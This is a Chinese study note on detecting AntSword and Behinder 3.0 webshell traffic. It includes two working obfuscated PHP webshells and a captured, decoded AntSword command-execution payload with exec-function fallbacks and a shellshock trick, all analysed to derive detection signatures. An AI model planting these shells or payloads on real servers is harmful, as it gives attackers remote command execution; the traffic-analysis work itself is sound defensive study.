常见流量分析——蚁剑、冰蝎3.0篇

前言

前段时间面试了某个蓝中,问到了流量辨别,但是准备得不太好,问了两个问题就被拿下了。因此这里简单学习分析一下常见的蚁剑和冰蝎3的流量特征,后面可能会补充其他几个工具。

Antsword 蚁剑

测试方法

将 antsword 的代理设置为 yakit 的 MITM 抓包端口:
image.png

shell内容

<?php class G40yQ75K { public function __construct($H8744){ @eval("/*Z#h*u@!hyP709104P*/".$H8744."/*Z#h*u@!hyP709104P*/"); }}new G40yQ75K($_REQUEST['123']);?>

default模式分析

正常执行命令:ls
image.png
请求包

POST /antsword.php HTTP/1.1
Host: 192.168.111.11:9290
Accept-Encoding: gzip, deflate
Content-Length: 4878
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; OpenBSD amd64; rv:28.0) Gecko/20100101 Firefox/28.0

123=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3B%24opdir%3D%40ini_get(%22open_basedir%22)%3Bif(%24opdir)%20%7B%24ocwd%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3B%24oparr%3Dpreg_split(base64_decode(%22Lzt8Oi8%3D%22)%2C%24opdir)%3B%40array_push(%24oparr%2C%24ocwd%2Csys_get_temp_dir())%3Bforeach(%24oparr%20as%20%24item)%20%7Bif(!%40is_writable(%24item))%7Bcontinue%3B%7D%3B%24tmdir%3D%24item.%22%2F.8a12e6d5fb%22%3B%40mkdir(%24tmdir)%3Bif(!%40file_exists(%24tmdir))%7Bcontinue%3B%7D%24tmdir%3Drealpath(%24tmdir)%3B%40chdir(%24tmdir)%3B%40ini_set(%22open_basedir%22%2C%20%22..%22)%3B%24cntarr%3D%40preg_split(%22%2F%5C%5C%5C%5C%7C%5C%2F%2F%22%2C%24tmdir)%3Bfor(%24i%3D0%3B%24i%3Csizeof(%24cntarr)%3B%24i%2B%2B)%7B%40chdir(%22..%22)%3B%7D%3B%40ini_set(%22open_basedir%22%2C%22%2F%22)%3B%40rmdir(%24tmdir)%3Bbreak%3B%7D%3B%7D%3B%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob_end_clean()%3Becho%20%2294f5%22.%229c862%22%3Becho%20%40asenc(%24output)%3Becho%20%22213f8f%22.%2298dff6%22%3B%7Dob_start()%3Btry%7B%24p%3Dbase64_decode(substr(%24_POST%5B%22qff008052217ff%22%5D%2C2))%3B%24s%3Dbase64_decode(substr(%24_POST%5B%22f12d7548c56512%22%5D%2C2))%3B%24envstr%3D%40base64_decode(substr(%24_POST%5B%22b832f5f8b2f391%22%5D%2C2))%3B%24d%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3B%24c%3Dsubstr(%24d%2C0%2C1)%3D%3D%22%2F%22%3F%22-c%20%5C%22%7B%24s%7D%5C%22%22%3A%22%2Fc%20%5C%22%7B%24s%7D%5C%22%22%3Bif(substr(%24d%2C0%2C1)%3D%3D%22%2F%22)%7B%40putenv(%22PATH%3D%22.getenv(%22PATH%22).%22%3A%2Fusr%2Flocal%2Fsbin%3A%2Fusr%2Flocal%2Fbin%3A%2Fusr%2Fsbin%3A%2Fusr%2Fbin%3A%2Fsbin%3A%2Fbin%22)%3B%7Delse%7B%40putenv(%22PATH%3D%22.getenv(%22PATH%22).%22%3BC%3A%2FWindows%2Fsystem32%3BC%3A%2FWindows%2FSysWOW64%3BC%3A%2FWindows%3BC%3A%2FWindows%2FSystem32%2FWindowsPowerShell%2Fv1.0%2F%3B%22)%3B%7Dif(!empty(%24envstr))%7B%24envarr%3Dexplode(%22%7C%7C%7Casline%7C%7C%7C%22%2C%20%24envstr)%3Bforeach(%24enva
rr%20as%20%24v)%20%7Bif%20(!empty(%24v))%20%7B%40putenv(str_replace(%22%7C%7C%7Caskey%7C%7C%7C%22%2C%20%22%3D%22%2C%20%24v))%3B%7D%7D%7D%24r%3D%22%7B%24p%7D%20%7B%24c%7D%22%3Bfunction%20fe(%24f)%7B%24d%3Dexplode(%22%2C%22%2C%40ini_get(%22disable_functions%22))%3Bif(empty(%24d))%7B%24d%3Darray()%3B%7Delse%7B%24d%3Darray_map('trim'%2Carray_map('strtolower'%2C%24d))%3B%7Dreturn(function_exists(%24f)%26%26is_callable(%24f)%26%26!in_array(%24f%2C%24d))%3B%7D%3Bfunction%20runshellshock(%24d%2C%20%24c)%20%7Bif%20(substr(%24d%2C%200%2C%201)%20%3D%3D%20%22%2F%22%20%26%26%20fe('putenv')%20%26%26%20(fe('error_log')%20%7C%7C%20fe('mail')))%20%7Bif%20(strstr(readlink(%22%2Fbin%2Fsh%22)%2C%20%22bash%22)%20!%3D%20FALSE)%20%7B%24tmp%20%3D%20tempnam(sys_get_temp_dir()%2C%20'as')%3Bputenv(%22PHP_LOL%3D()%20%7B%20x%3B%20%7D%3B%20%24c%20%3E%24tmp%202%3E%261%22)%3Bif%20(fe('error_log'))%20%7Berror_log(%22a%22%2C%201)%3B%7D%20else%20%7Bmail(%22a%40127.0.0.1%22%2C%20%22%22%2C%20%22%22%2C%20%22-bv%22)%3B%7D%7D%20else%20%7Breturn%20False%3B%7D%24output%20%3D%20%40file_get_contents(%24tmp)%3B%40unlink(%24tmp)%3Bif%20(%24output%20!%3D%20%22%22)%20%7Bprint(%24output)%3Breturn%20True%3B%7D%7Dreturn%20False%3B%7D%3Bfunction%20runcmd(%24c)%7B%24ret%3D0%3B%24d%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3Bif(fe('system'))%7B%40system(%24c%2C%24ret)%3B%7Delseif(fe('passthru'))%7B%40passthru(%24c%2C%24ret)%3B%7Delseif(fe('shell_exec'))%7Bprint(%40shell_exec(%24c))%3B%7Delseif(fe('exec'))%7B%40exec(%24c%2C%24o%2C%24ret)%3Bprint(join(%22%0A%22%2C%24o))%3B%7Delseif(fe('popen'))%7B%24fp%3D%40popen(%24c%2C'r')%3Bwhile(!%40feof(%24fp))%7Bprint(%40fgets(%24fp%2C2048))%3B%7D%40pclose(%24fp)%3B%7Delseif(fe('proc_open'))%7B%24p%20%3D%20%40proc_open(%24c%2C%20array(1%20%3D%3E%20array('pipe'%2C%20'w')%2C%202%20%3D%3E%20array('pipe'%2C%20'w'))%2C%20%24io)%3Bwhile(!%40feof(%24io%5B1%5D))%7Bprint(%40fgets(%24io%5B1%5D%2C2048))%3B%7Dwhile(!%40feof(%24io%5B2%5D))%7Bprint(%40fgets(%24io%5B2%5D%2C2048))%3B%7D%40f
close(%24io%5B1%5D)%3B%40fclose(%24io%5B2%5D)%3B%40proc_close(%24p)%3B%7Delseif(fe('antsystem'))%7B%40antsystem(%24c)%3B%7Delseif(runshellshock(%24d%2C%20%24c))%20%7Breturn%20%24ret%3B%7Delseif(substr(%24d%2C0%2C1)!%3D%22%2F%22%20%26%26%20%40class_exists(%22COM%22))%7B%24w%3Dnew%20COM('WScript.shell')%3B%24e%3D%24w-%3Eexec(%24c)%3B%24so%3D%24e-%3EStdOut()%3B%24ret.%3D%24so-%3EReadAll()%3B%24se%3D%24e-%3EStdErr()%3B%24ret.%3D%24se-%3EReadAll()%3Bprint(%24ret)%3B%7Delse%7B%24ret%20%3D%20127%3B%7Dreturn%20%24ret%3B%7D%3B%24ret%3D%40runcmd(%24r.%22%202%3E%261%22)%3Bprint%20(%24ret!%3D0)%3F%22ret%3D%7B%24ret%7D%22%3A%22%22%3B%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3B&b832f5f8b2f391=aY&f12d7548c56512=98Y2QgIi92YXIvd3d3L2h0bWwiO2xzO2VjaG8gOGYzNTMzNztwd2Q7ZWNobyA1OGRhZTA%3D&qff008052217ff=nmL2Jpbi9zaA%3D%3D

可以先把 POST 中传入的 PHP 代码部分 URL 解码并提取出来:

<?php
// Decoded body of the `123=` parameter from the AntSword "default" request above.
// Comments added for traffic/host detection only; the code itself is unchanged.

// Fixed prologue: present verbatim in every default-encoder request (URL-encoded on the wire).
@ini_set("display_errors", "0");
@set_time_limit(0);
// open_basedir handling. The hard-coded directory name ".8a12e6d5fb" is a static string
// that can be matched in request bodies and, briefly, on disk.
$opdir = @ini_get("open_basedir");
if ($opdir) {
$ocwd = dirname($_SERVER["SCRIPT_FILENAME"]);
// "Lzt8Oi8=" is base64 for the regex /;|:/ used to split open_basedir entries.
$oparr = preg_split(base64_decode("Lzt8Oi8="), $opdir);
@array_push($oparr, $ocwd, sys_get_temp_dir());
foreach ($oparr as $item) {
if (!@is_writable($item)) {
continue;
};
$tmdir = $item . "/.8a12e6d5fb";
@mkdir($tmdir);
if (!@file_exists($tmdir)) {
continue;
}
$tmdir = realpath($tmdir);
@chdir($tmdir);
@ini_set("open_basedir", "..");
$cntarr = @preg_split("/\\\\|\//", $tmdir);
for ($i = 0; $i < sizeof($cntarr); $i++) {
@chdir("..");
};
@ini_set("open_basedir", "/");
@rmdir($tmdir);
break;
};
};;
// asenc() is an identity here; presumably the other encoders swap in a real transform.
function asenc($out)
{
return $out;
};
// Response framing: the two echoed hex strings bracket the real output, so a response body
// looks like <hex><hex><output><hex><hex>. The article notes the values are random per
// request; the fixed shape (hex prefix/suffix around plain output) is the detectable part.
function asoutput()
{
$output = ob_get_contents();
ob_end_clean();
echo "94f5" . "9c862";
echo @asenc($output);
echo "213f8f" . "98dff6";
}
ob_start();
try {
// Three POST parameters with random-looking 14-character names: $p is the program to run,
// $s the command line, $envstr optional extra environment. Each value is base64 after
// substr(..., 2) drops its first two characters (compare "aY", "98", "nm" in the capture).
$p = base64_decode(substr($_POST["qff008052217ff"], 2));
$s = base64_decode(substr($_POST["f12d7548c56512"], 2));
$envstr = @base64_decode(substr($_POST["b832f5f8b2f391"], 2));
$d = dirname($_SERVER["SCRIPT_FILENAME"]);
// A leading "/" in the script directory is the only OS check: "-c" for a POSIX shell, "/c" for cmd.exe.
$c = substr($d, 0, 1) == "/" ? "-c \"{$s}\"" : "/c \"{$s}\"";
if (substr($d, 0, 1) == "/") {
@putenv("PATH=" . getenv("PATH") . ":/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin");
} else {
@putenv("PATH=" . getenv("PATH") . ";C:/Windows/system32;C:/Windows/SysWOW64;C:/Windows;C:/Windows/System32/WindowsPowerShell/v1.0/;");
}
// Extra environment arrives as "KEY|||askey|||VALUE" entries joined by "|||asline|||";
// both literals are fixed and usable as signatures on the decoded parameter.
if (!empty($envstr)) {
$envarr = explode("|||asline|||", $envstr);
foreach ($envarr as $v) {
if (!empty($v)) {
@putenv(str_replace("|||askey|||", "=", $v));
}
}
}
$r = "{$p} {$c}";
// fe(): true when $f exists, is callable and is not listed in disable_functions.
function fe($f)
{
$d = explode(",", @ini_get("disable_functions"));
if (empty($d)) {
$d = array();
} else {
$d = array_map('trim', array_map('strtolower', $d));
}
return (function_exists($f) && is_callable($f) && !in_array($f, $d));
};
// Fallback used when the usual exec functions are disabled (env-var trick via error_log()/mail()
// when /bin/sh is bash). The literal "PHP_LOL=() { x; };" is a static indicator.
function runshellshock($d, $c)
{
if (substr($d, 0, 1) == "/" && fe('putenv') && (fe('error_log') || fe('mail'))) {
if (strstr(readlink("/bin/sh"), "bash") != FALSE) {
$tmp = tempnam(sys_get_temp_dir(), 'as');
putenv("PHP_LOL=() { x; }; $c >$tmp 2>&1");
if (fe('error_log')) {
error_log("a", 1);
} else {
mail("a@127.0.0.1", "", "", "-bv");
}
} else {
return False;
}
$output = @file_get_contents($tmp);
@unlink($tmp);
if ($output != "") {
print($output);
return True;
}
}
return False;
};
// Tries the exec functions in a fixed order (system, passthru, shell_exec, exec, popen,
// proc_open, antsystem, the fallback above, then COM on Windows). Returns the exit status,
// or 127 when no method was available.
function runcmd($c)
{
$ret = 0;
$d = dirname($_SERVER["SCRIPT_FILENAME"]);
if (fe('system')) {
@system($c, $ret);
} elseif (fe('passthru')) {
@passthru($c, $ret);
} elseif (fe('shell_exec')) {
print(@shell_exec($c));
} elseif (fe('exec')) {
@exec($c, $o, $ret);
print(join("
", $o));
} elseif (fe('popen')) {
$fp = @popen($c, 'r');
while (!@feof($fp)) {
print(@fgets($fp, 2048));
}
@pclose($fp);
} elseif (fe('proc_open')) {
$p = @proc_open($c, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
while (!@feof($io[1])) {
print(@fgets($io[1], 2048));
}
while (!@feof($io[2])) {
print(@fgets($io[2], 2048));
}
@fclose($io[1]);
@fclose($io[2]);
@proc_close($p);
} elseif (fe('antsystem')) {
@antsystem($c);
} elseif (runshellshock($d, $c)) {
return $ret;
} elseif (substr($d, 0, 1) != "/" && @class_exists("COM")) {
$w = new COM('WScript.shell');
$e = $w->exec($c);
$so = $e->StdOut();
$ret .= $so->ReadAll();
$se = $e->StdErr();
$ret .= $se->ReadAll();
print($ret);
} else {
$ret = 127;
}
return $ret;
};
// stderr is merged into stdout; a non-zero exit status is appended as "ret=<n>".
$ret = @runcmd($r . " 2>&1");
print ($ret != 0) ? "ret={$ret}" : "";;
} catch (Exception $e) {
echo "ERROR://" . $e->getMessage();
};
asoutput();
die();

其中负责读取参数的关键代码:

$p = base64_decode(substr($_POST["qff008052217ff"], 2));
$s = base64_decode(substr($_POST["f12d7548c56512"], 2));
$envstr = @base64_decode(substr($_POST["b832f5f8b2f391"], 2));

每个参数值都先通过 substr(..., 2) 去掉前两个字符,再进行 base64 解码,这里测试一下传入的参数:

b832f5f8b2f391=aY&f12d7548c56512=98Y2QgIi92YXIvd3d3L2h0bWwiO2xzO2VjaG8gOGYzNTMzNztwd2Q7ZWNobyA1OGRhZTA=&qff008052217ff=nmL2Jpbi9zaA==

image.png
image.png

base64模式分析

请求包

POST /antsword.php HTTP/1.1
Host: 192.168.111.11:9290
Accept-Encoding: gzip, deflate
Content-Length: 1754
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0

123=%40eval(%40base64_decode(%24_POST%5B'kb9d1f833840ab'%5D))%3B&b414e120ef931b=A3L3Zhci93d3cv&kb9d1f833840ab=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

首先可以看到,传入的代码部分只是对参数做一次 base64 解码再 eval,
image.png
将对应传参base64解码即可得到代码:
image.png
返回包的格式是:前面一段随机字符串,后面一段随机字符串,中间才是有效内容(对应上面 asoutput() 中前后两次 echo):
可以先不考虑后面的随机字符串,从前面逐个删除字符并尝试 base64 解码,爆破出有效内容:

import base64
import sys

# 假设的编码文本
encoded_text = "ca9adb9Li4vCTIwMjEtMTEtMzAgMDg6NDQ6NDgJNDA5NgkwNzU1Ci4vCTIwMjQtMDQtMDcgMDQ6MTc6MjMJNDA5NgkwNzU1Cmh0bWwvCTIwMjQtMDUtMjkgMDc6MTc6MTEJNDA5NgkwNzc3CmxvY2FsaG9zdC8JMjAyNC0wNC0wNyAwNDoxNzoyMwk0MDk2CTA3NTUK297c43"

# 假定最小的有效Base64编码长度为一定值,这里假设为16
min_valid_length = 16

# 尝试爆破,去除前后可能的随机文本
for i in range(len(encoded_text)):
for j in range(len(encoded_text), 0, -1):
if j - i > min_valid_length:
try:
# 尝试解码当前子串
decoded_text = base64.b64decode(encoded_text[i:j]).decode()
# 如果成功解码,打印结果
print("成功解码:", decoded_text)
sys.exit()
except Exception as e:
# 解码失败,继续尝试
pass

image.png

特征分析

蚁剑明显的固有特征即为代码部分开头的 @ini_set("display_errors", "0");@set_time_limit(0); 部分;在 default 模式下它以 URL 编码的形式直接出现在请求体中(%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3B),可以直接作为检测规则匹配。

Behinder3.0 冰蝎3.0

shell内容

<?php @error_reporting(0);session_start();$key="202cb962ac59075b";$_SESSION['k']=$key;$f='file'.'_get'.'_contents';$p='|||||||||||'^chr(12).chr(20).chr(12).chr(70).chr(83).chr(83).chr(21).chr(18).chr(12).chr(9).chr(8);$Ht74n=$f($p);if(!extension_loaded('openssl')){ $t=preg_filter('/+/','','base+64+_+deco+de');$Ht74n=$t($Ht74n."");for($i=0;$i<strlen($Ht74n);$i++) { $new_key = $key[$i+1&15];$Ht74n[$i] = $Ht74n[$i] ^ $new_key;} }else{ $Ht74n=openssl_decrypt($Ht74n, "AES128", $key);}$arr=explode('|',$Ht74n);$func=$arr[0];$params=$arr[1];class G6H53OR4{ public function /*Z#��h*u@!h736H186wQ*/__invoke($p) {@eval("/*Z#��h*u@!h736H186wQ*/".$p."");}}@call_user_func/*Z#��h*u@!h736H186wQ*/(new G6H53OR4(),$params);?>

密码123

模式分析

image.png
我们需要先将上传木马中的key提取出来:202cb962ac59075b

特征分析

强特征 - application/octet-stream

在冰蝎3.0中我们直接查看发包函数 sendPostRequest 的源代码(位于 net.rebeyond.behinder.utils.Utils):
image.png
能注意到其中有一个强特征就是 Content-Type: application/octet-stream。application/octet-stream 是一个 MIME 类型,表示二进制数据流。它通常用于以下情况:

  • 未知文件类型: 当服务器无法确定文件的具体类型时,会使用 application/octet-stream 作为默认类型。
  • 二进制文件: 例如,压缩文件(zip、rar)、可执行文件(exe、jar)、图片文件(jpg、png)等。
  • 下载文件: 当用户从服务器下载文件时,服务器会使用 application/octet-stream 来指示浏览器应该将文件保存到本地磁盘,而不是在浏览器中直接打开。

简单来说,application/octet-stream 就是告诉浏览器:“这是一个二进制数据流,你无法直接理解它,请把它保存到本地磁盘,或者使用合适的应用程序打开它。”
除非反编译并修改源代码,否则这个特征不会改变。

弱特征 - User-Agent

弱特征,可以很容易就被修改,冰蝎3.0在net.rebeyond.behinder.core.Constatns中定义了Cookie常量:
image.png
每次会在其中选择一个使用:
image.png
image.png
因为我现在使用的版本已经被修改过UA,这里提供下未修改的UA:

冰蝎3.0流量特征分析(附特征) - FreeBuf网络安全行业门户

Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.163 Safari/535.1
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101 Firefox/6.0
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
Opera/9.80 (Windows NT 6.1; U; zh-cn) Presto/2.9.168 Version/11.50
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; Tablet PC 2.0; .NET4.0E)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.0)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Mozilla/5.0 (Windows; U; Windows NT 6.1; ) AppleWebKit/534.12 (KHTML, like Gecko) Maxthon/3.0 Safari/534.12
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E; SE 2.X MetaSr 1.0)
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.33 Safari/534.3 SE 2.X MetaSr 1.0
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1 QQBrowser/6.9.11079.201
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) QQBrowser/6.9.11079.201

强特征 - Accept&Cache-Control

从 net.rebeyond.behinder.utils.Utils 中的 sendPostRequestBinary 函数可以发现,它是使用 HttpURLConnection 实现交互的。
image.png
这里我有一点不懂:为什么这里引用的是 java.net 下的 HttpURLConnection,但网上的分析却是 sun.net.www.protocol.http 下的 HttpURLConnection?(两者并不矛盾:java.net.HttpURLConnection 只是抽象类,URL.openConnection() 对 http 返回的实际对象就是 sun.net.www.protocol.http.HttpURLConnection,默认请求头正是在后者的 writeRequests 中填充的。)
image.png
Utils 中引用的也是 java.net 下的。可能是我使用的这个版本是别人修改过的,因为这里 sendPostRequestBinary 函数中的 application/octet-stream 特征已经被删除了。下面按照网上的内容继续分析。
在 sun.net.www.protocol.http.HttpURLConnection#writeRequests 中我们能看到:
image.png
image.png
image.png
如果没有对 Cache-Control、Pragma、Accept、User-Agent 赋值,就会设置为默认值:

Cache-Control: no-cache
Pragma: no-cache
User-Agent: Java/你的版本号
Accept: */*

这是 Java 20 的实现,而网上常见的是 Java 8 的格式:

Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Cache-Control: no-cache
Pragma: no-cache
User-Agent: java/1.8

而冰蝎自己只设置了 UA,另外三个头没有被冰蝎设置,因此会落到上面的默认值。
image.png
而因为我这里运行的 Java 版本是 11,所以抓到的 Accept 值和上面两种结果都不一样。

弱特征 - Content-length

冰蝎的请求会调用 Utils.getData 函数对请求参数加密;对于密钥交互、获取基本信息等 payload 固定的操作,加密后的内容和长度也是固定的,因此这些请求的 Content-Length 会重复出现。
image.png
缺点是这个可能不太准,因此作为弱特征。

后记

后面有机会把其他的几个补充补充。